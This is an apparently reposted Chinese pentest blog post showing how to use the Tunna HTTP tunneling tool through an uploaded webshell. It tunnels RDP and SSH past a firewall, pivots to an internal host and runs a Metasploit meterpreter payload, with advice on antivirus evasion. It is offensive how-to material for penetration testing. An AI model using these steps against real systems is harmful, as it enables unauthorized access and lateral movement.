tunna工具使用實例

原創 jzking121 2019-07-28 13:11

原理:就是個HTTP tunneling工具

224402543.jpg

可以看出該工具先使用proxy.py監聽本地一個端口,然後連接部署在遠程WEB的webshell,遠端的webshell會把端口轉發請求轉發到本地或者本地內網遠程的主機,從而實現HTTP tunneling.這對於內網***來說,是很有用的一個工具.

該工具看起來是不是有似曾相識的感覺,恩.其實和reduh原理是一樣的,不過tunna更穩定,速度更快.

下載地址是:

http://www.secforce.com/media/tools/tunna_v0.1.zip(博文附件已備份)


下面講解4個實例,就能掌握該工具使用方法了.

實例1:

網站對外只開放了80端口,其他的端口都是關閉的,通過CVE-2013-225得到JSP的WEBSHELL後,上傳conn.jsp,做轉發,實現連接本機的其他端口.

直接掃描發現3389是關閉的

mickey@pentest:~# nmap -sS -p3389 219.x.x.x
Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
Nmap scan report for 219.x.x.x
Host is up (0.0088s latency).
PORT     STATE SERVICE
3389/tcp close


通過webshell上傳conn.jsp到主機上,本地開始連接

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v


參數含義如下:

-l 表示本地監聽的端口
-r 遠程要轉發的端口
-v 詳細模式

然後本地執行:

rdesktop 127.0.0.1:1234

就可以連接到目標的3389了

225125396.jpg

實例2:

對於有些服務,比如SSH,還需要添加-s參數,才能保證連接的時候不會中斷.

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s
ssh localhost -p 1234

225243980.jpg


實例3:

場景:已經得到DMZ區的一臺主機的JSPSHELL,該主機的內網IP是172.16.100.20,通過查點,發現DMZ區還有其他的主機(172.16.100.20),並且開放了3389,我們想利用HTTP tunneling,連接到172.16.100.20的3389,命令如下


python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

這裏多了一個-a參數,意義是要轉發的IP

實例4:

對於喜歡metasploit的朋友,該工具也支持,不過如果對方有殺軟的話,建議先用veil做好meterpreter的免殺.

首先把tunna_exploit.rb拷貝到msf的modules/exploits/windows/misc目錄.

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

然後開始利用
msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7  <-- 注意這裏是指本地的公網IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j

tunna除了支持jsp還支持以下環境和腳本
conn.jsp Tested on Apache Tomcat (windows + linux)
conn.aspx Tested on IIS 6+8 (windows server 2003/2012)
conn.php Tested on LAMP + XAMPP + IIS (windows + linux)
使用的時候需要注意:metasploit裏的腳本只對應metasploit使用.

轉載自WooYun知識,原文地址:http://drops.wooyun.org/tools/650
作者:mickey 














發表評論














所有評論



還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.







相關文章








Centos7安裝輕量級TCP轉發工具rinetd註冊爲服務的正確姿勢 並設置開機自啓 實踐筆記 自用






Centos7安裝輕量級TCP轉發工具rinetd註冊爲服務的正確姿勢 並設置開機自啓 實踐筆記 自用CentOS-7-x86_64-Minimal-1708rinetd 0.62注意rinetd只支持TCP不支持UDP轉發,需要






 JanelSirry

2020-06-28 07:45:40









reduh-maste工具的使用






1.將reDuhServers\reDuh.aspx上傳到網站目錄
2.攻擊機使用reDuhClient\dist\reDuhClient.jar連接剛剛上傳的reDuh.aspx文件,會在本地生成一個1010端口
java -






 一个蝙蝠的故事

2020-06-22 16:01:10









reduh端口轉發工具使用介紹






將reDuhServers\reDuh.aspx上傳到網站目錄
2.攻擊機使用reDuhClient\dist\reDuhClient.jar連接剛剛上傳的reDuh.aspx文件,會在本地生成一個1010端口
java -






 一个蝙蝠的故事

2020-06-22 16:01:09









4-3·SSH免密、祕鑰驗證、端口轉發






一·配置SSH服務器使用祕鑰驗證登錄。爲客戶端創建私鑰,爲服務器創建公鑰。
1)生成祕鑰。
$ ssh-keygen -t rsa //生成,一路回車
$ mv ~/.ssh/id_rsa.pub ~/.ss






 CooperLii

2020-06-17 04:00:27









內網轉發之Netsh端口轉發的使用學習






 努力的学渣'#

2020-06-02 19:40:05









端口轉發以及在LInux服務器上連接其他服務器






 宜城有少年

2020-05-23 09:08:28









windows配置本地端口映射到其它電腦






 jamesdodo

2020-04-26 20:13:51









linux ssh 端口轉發






 625536506

2020-03-14 15:52:43









vmware fusion NAT下的端口,ip配置






 linsanhua

2020-02-25 15:12:50









用Nginx做端口轉發(反向代理)






 zoollcar

2020-02-25 14:52:33









用雲主機搭建私有的遠程網關,實現訪問內網電腦






 日后定负责

2020-02-22 15:48:58









Centos配置80 端口轉發






 剑侠365

2020-02-20 17:07:17









C#開發的簡單端口轉發程序的代碼






 rhododend

2019-07-28 13:28:00









使用SSH進行端口轉發






 mastters

2019-07-19 14:15:51









端口轉發工具rinetd






 qq5dfce0a126692

2020-03-25 14:05:43